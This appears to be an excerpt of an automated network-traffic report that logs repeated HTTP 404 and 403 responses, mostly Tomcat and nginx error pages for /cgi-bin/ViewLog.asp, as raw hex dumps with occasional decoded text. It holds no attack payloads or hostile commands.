    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 989Date: Thu, 23 Nov 2023 04:13:01 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 989Date: Thu, 23 Nov 2023 04:12:48 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 989Date: Thu, 23 Nov 2023 04:12:52 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 989Date: Thu, 23 Nov 2023 04:13:01 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 23 Nov 2023 04:16:04 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 989Date: Thu, 23 Nov 2023 04:13:01 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 1007Date: Thu, 23 Nov 2023 04:16:10 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 36 20 28 44 65 62 69 61 6e 29 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 